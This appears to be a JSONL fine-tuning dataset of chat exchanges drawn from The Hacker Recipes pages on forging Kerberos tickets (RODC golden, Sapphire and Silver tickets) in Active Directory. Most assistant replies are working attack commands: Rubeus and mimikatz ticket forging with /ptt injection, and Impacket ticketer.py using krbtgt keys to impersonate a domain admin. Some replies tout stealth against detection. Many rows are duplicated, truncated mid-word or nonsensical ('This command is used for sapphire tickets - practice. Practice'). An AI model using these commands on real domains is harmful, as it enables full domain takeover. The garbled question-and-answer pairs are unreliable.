/domain:domain.local /sid:DOMAIN_SID\n``\n\n:::\n\n> [!TIP]\n> > The secret ingredient for making an RODC golden ticket viable is including the correct key version number in the _kvno_ field of the ticket. \n> >\n> > _(Elad Shamir on_ _specterops.io__)_", "metadata": {"corpus_index": 617, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md", "page_title": "RODC Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform RODC Golden tickets - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n_For the moment, no tool is available to only forge a RODC Golden Ticket from UNIX-like systems._\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose.\n\n``powershell\nRubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID\n``\n\n:::\n\n> [!TIP]\n> > The secret ingredient for making an RODC golden ticket viable is including the correct key version number in the _kvno_ field of the ticket. \n> >\n> > _(Elad Shamir on_ _specterops.io__)_"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform RODC Golden tickets - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\n_For the moment, no tool is available to only forge a RODC Golden Ticket from UNIX-like systems._\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose.\n\n``powershell\nRubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID\n``\n\n:::\n\n> [!TIP]\n> > The secret ingredient for making an RODC golden ticket viable is including the correct key version number in the _kvno_ field of the ticket. \n> >\n> > _(Elad Shamir on_ _specterops.io__)_", "metadata": {"corpus_index": 617, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md", "page_title": "RODC Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Sapphire tickets - Practice in the context of penetration testing"}, {"role": "assistant", "content": "Since Diamond tickets modify PACs on-the-fly to include arbitrary group IDs, chances are that some detection software can (or will be able to) detect discrepancies between a PAC's values and actual AD relationships (e.g. a PAC indicates a user belongs to some groups when in fact it doesn't).\n\nSapphire tickets are an alternative to obtaining similar tickets in a stealthier way, by including a legitimate powerful user's PAC in the ticket. There will be no discrepancy anymore between what's in the PAC and what's in Active Directory.\n\nThe powerful user's PAC can be obtained through an S4U2self+u2u trick.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes with the -impersonate argument.\n\nNota bene: the -user-id argument will be used to build the \"Requestor\" PAC structure, which could be needed in up-to-date environments (see warning at the bottom of this page).\n\nThe arguments used to customize the PAC will be ignored (-groups, -extra-sid,-duration), the required domain SID (-domain-sid) as well as the username supplied in the positional argument (baduser in this case). All these information will be kept as-is from the PAC obtained beforehand using the \"S4U2self + U2U\" technique.\n\n``bash\nticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'\n`\n\n=== Windows\n\n_At the time of writing this recipe (September 2022), no equivalent exists for Windows systems._\n\n:::\n\n> [!NOTE]\n> In 2021, Microsoft issued a patch (KB5008380) for CVE-2021-42287 (see samaccountname-spoofing.md). The patch is explained a bit more in this blogpost. When the patch entered its enforcement phase (Oct. 11th 2022), it made the Sapphire Ticket attack harder to conduct.\n> \n> The patch introduced two new structures inside a TGT's PAC: \"Requestor\" (PAC_REQUESTOR) and \"Attributes\" (PA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Sapphire tickets - Practice in the context of penetration testing", "response": "Since Diamond tickets modify PACs on-the-fly to include arbitrary group IDs, chances are that some detection software can (or will be able to) detect discrepancies between a PAC's values and actual AD relationships (e.g. a PAC indicates a user belongs to some groups when in fact it doesn't).\n\nSapphire tickets are an alternative to obtaining similar tickets in a stealthier way, by including a legitimate powerful user's PAC in the ticket. There will be no discrepancy anymore between what's in the PAC and what's in Active Directory.\n\nThe powerful user's PAC can be obtained through an S4U2self+u2u trick.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes with the -impersonate argument.\n\nNota bene: the -user-id argument will be used to build the \"Requestor\" PAC structure, which could be needed in up-to-date environments (see warning at the bottom of this page).\n\nThe arguments used to customize the PAC will be ignored (-groups, -extra-sid,-duration), the required domain SID (-domain-sid) as well as the username supplied in the positional argument (baduser in this case). All these information will be kept as-is from the PAC obtained beforehand using the \"S4U2self + U2U\" technique.\n\n``bash\nticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'\n`\n\n=== Windows\n\n_At the time of writing this recipe (September 2022), no equivalent exists for Windows systems._\n\n:::\n\n> [!NOTE]\n> In 2021, Microsoft issued a patch (KB5008380) for CVE-2021-42287 (see samaccountname-spoofing.md). The patch is explained a bit more in this blogpost. When the patch entered its enforcement phase (Oct. 11th 2022), it made the Sapphire Ticket attack harder to conduct.\n> \n> The patch introduced two new structures inside a TGT's PAC: \"Requestor\" (PAC_REQUESTOR) and \"Attributes\" (PA", "metadata": {"corpus_index": 618, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/sapphire.md", "page_title": "Sapphire tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Sapphire tickets - Practice"}, {"role": "assistant", "content": "Since Diamond tickets modify PACs on-the-fly to include arbitrary group IDs, chances are that some detection software can (or will be able to) detect discrepancies between a PAC's values and actual AD relationships (e.g. a PAC indicates a user belongs to some groups when in fact it doesn't).\n\nSapphire tickets are an alternative to obtaining similar tickets in a stealthier way, by including a legitimate powerful user's PAC in the ticket. There will be no discrepancy anymore between what's in the PAC and what's in Active Directory.\n\nThe powerful user's PAC can be obtained through an S4U2self+u2u trick.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes with the -impersonate argument.\n\nNota bene: the -user-id argument will be used to build the \"Requestor\" PAC structure, which could be needed in up-to-date environments (see warning at the bottom of this page).\n\nThe arguments used to customize the PAC will be ignored (-groups, -extra-sid,-duration), the required domain SID (-domain-sid) as well as the username supplied in the positional argument (baduser in this case). All these information will be kept as-is from the PAC obtained beforehand using the \"S4U2self + U2U\" technique.\n\n``bash\nticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'\n`\n\n=== Windows\n\n_At the time of writing this recipe (September 2022), no equivalent exists for Windows systems._\n\n:::\n\n> [!NOTE]\n> In 2021, Microsoft issued a patch (KB5008380) for CVE-2021-42287 (see samaccountname-spoofing.md). The patch is explained a bit more in this blogpost. When the patch entered its enforcement phase (Oct. 11th 2022), it made the Sapphire Ticket attack harder to conduct.\n> \n> The patch introduced two new structures inside a TGT's PAC: \"Requestor\" (PAC_REQUESTOR) and \"Attributes\" (PA"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Sapphire tickets - Practice", "response": "Since Diamond tickets modify PACs on-the-fly to include arbitrary group IDs, chances are that some detection software can (or will be able to) detect discrepancies between a PAC's values and actual AD relationships (e.g. a PAC indicates a user belongs to some groups when in fact it doesn't).\n\nSapphire tickets are an alternative to obtaining similar tickets in a stealthier way, by including a legitimate powerful user's PAC in the ticket. There will be no discrepancy anymore between what's in the PAC and what's in Active Directory.\n\nThe powerful user's PAC can be obtained through an S4U2self+u2u trick.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes with the -impersonate argument.\n\nNota bene: the -user-id argument will be used to build the \"Requestor\" PAC structure, which could be needed in up-to-date environments (see warning at the bottom of this page).\n\nThe arguments used to customize the PAC will be ignored (-groups, -extra-sid,-duration), the required domain SID (-domain-sid) as well as the username supplied in the positional argument (baduser in this case). All these information will be kept as-is from the PAC obtained beforehand using the \"S4U2self + U2U\" technique.\n\n``bash\nticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'\n`\n\n=== Windows\n\n_At the time of writing this recipe (September 2022), no equivalent exists for Windows systems._\n\n:::\n\n> [!NOTE]\n> In 2021, Microsoft issued a patch (KB5008380) for CVE-2021-42287 (see samaccountname-spoofing.md). The patch is explained a bit more in this blogpost. When the patch entered its enforcement phase (Oct. 11th 2022), it made the Sapphire Ticket attack harder to conduct.\n> \n> The patch introduced two new structures inside a TGT's PAC: \"Requestor\" (PAC_REQUESTOR) and \"Attributes\" (PA", "metadata": {"corpus_index": 618, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/sapphire.md", "page_title": "Sapphire tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the ticketer.py command for sapphire tickets - practice"}, {"role": "assistant", "content": "ticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the ticketer.py command for sapphire tickets - practice", "response": "ticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'", "metadata": {"corpus_index": 619, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/sapphire.md", "page_title": "Sapphire tickets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ticketer.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Sapphire tickets - Practice during a pentest?"}, {"role": "assistant", "content": "ticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Sapphire tickets - Practice during a pentest?", "response": "ticketer.py -request -impersonate 'domainadmin' \\\n-domain 'DOMAIN.FQDN' -user 'domain_user' -password 'password' \\\n-nthash 'krbtgt NT hash' -aesKey 'krbtgt AES key' \\\n-user-id '1115' -domain-sid 'S-1-5-21-...' \\\n'baduser'", "metadata": {"corpus_index": 619, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/sapphire.md", "page_title": "Sapphire tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ticketer.py -request -impersonate 'domainadmin' \\`?"}, {"role": "assistant", "content": "This command is used for sapphire tickets - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ticketer.py -request -impersonate 'domainadmin' \\`?", "response": "This command is used for sapphire tickets - practice. Practice", "metadata": {"corpus_index": 619, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/sapphire.md", "page_title": "Sapphire tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about with an NT hash"}, {"role": "assistant", "content": "python ticketer.py -nthash \"$NT_HASH\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about with an NT hash", "response": "python ticketer.py -nthash \"$NT_HASH\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\"", "metadata": {"corpus_index": 620, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute with an NT hash?"}, {"role": "assistant", "content": "python ticketer.py -nthash \"$NT_HASH\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute with an NT hash?", "response": "python ticketer.py -nthash \"$NT_HASH\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\"", "metadata": {"corpus_index": 620, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of with an AES (128 or 256 bits) key"}, {"role": "assistant", "content": "python ticketer.py -aesKey \"$AESkey\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\"\n``\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).\n\n=== Windows\n\nOn Windows, mimikatz can be used to generate a silver ticket with kerberos::golden. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of with an AES (128 or 256 bits) key", "response": "python ticketer.py -aesKey \"$AESkey\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\"\n``\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).\n\n=== Windows\n\nOn Windows, mimikatz can be used to generate a silver ticket with kerberos::golden. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.\n\n``bash", "metadata": {"corpus_index": 621, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with an AES (128 or 256 bits) key"}, {"role": "assistant", "content": "python ticketer.py -aesKey \"$AESkey\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\"\n``\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).\n\n=== Windows\n\nOn Windows, mimikatz can be used to generate a silver ticket with kerberos::golden. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with an AES (128 or 256 bits) key", "response": "python ticketer.py -aesKey \"$AESkey\" -domain-sid \"$DomainSID\" -domain \"$DOMAIN\" -spn \"$SPN\" \"username\"\n``\n\nThe SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).\n\n=== Windows\n\nOn Windows, mimikatz can be used to generate a silver ticket with kerberos::golden. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.\n\n``bash", "metadata": {"corpus_index": 621, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use The for with an aes (128 or 256 bits) key?"}, {"role": "assistant", "content": "The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)).\n\n\n=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) can be used to generate a silver ticket with [`kerberos::golden`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/golden). Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use The for with an aes (128 or 256 bits) key?", "response": "The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)).\n\n\n=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) can be used to generate a silver ticket with [`kerberos::golden`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/golden). Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.", "metadata": {"corpus_index": 622, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with an AES (128 or 256 bits) key"}, {"role": "assistant", "content": "The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)).\n\n\n=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) can be used to generate a silver ticket with [`kerberos::golden`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/golden). Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with an AES (128 or 256 bits) key", "response": "The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)).\n\n\n=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) can be used to generate a silver ticket with [`kerberos::golden`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/golden). Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.", "metadata": {"corpus_index": 622, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)).`?"}, {"role": "assistant", "content": "This command is used for with an aes (128 or 256 bits) key. with an AES (128 or 256 bits) key"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)).`?", "response": "This command is used for with an aes (128 or 256 bits) key. with an AES (128 or 256 bits) key", "metadata": {"corpus_index": 622, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about with an NT hash?"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about with an NT hash?", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt", "metadata": {"corpus_index": 623, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with an NT hash"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with an NT hash", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt", "metadata": {"corpus_index": 623, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is with an AES 128 key?"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is with an AES 128 key?", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt", "metadata": {"corpus_index": 624, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on with an AES 128 key"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on with an AES 128 key", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt", "metadata": {"corpus_index": 624, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does with an AES 256 key work?"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!SUCCESS]\n> A great, stealthier, alternative to silver ticket is to abuse S4U2self in order to impersonate a domain user with local admin privileges on the target machine by relying on Kerberos delegation instead of forging everything."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does with an AES 256 key work?", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!SUCCESS]\n> A great, stealthier, alternative to silver ticket is to abuse S4U2self in order to impersonate a domain user with local admin privileges on the target machine by relying on Kerberos delegation instead of forging everything.", "metadata": {"corpus_index": 625, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/silver.md", "page_title": "Silver tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute with an AES 256 key?"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::\n\n> [!SUCCESS]\n> A great, stealthier, alternative to silver ticket is to abuse S4U2self in order to impersonate a domain user with local admin privileges on the target machine by relying on Kerberos delegation instead of forging everything."}], "system": "You are a penetration 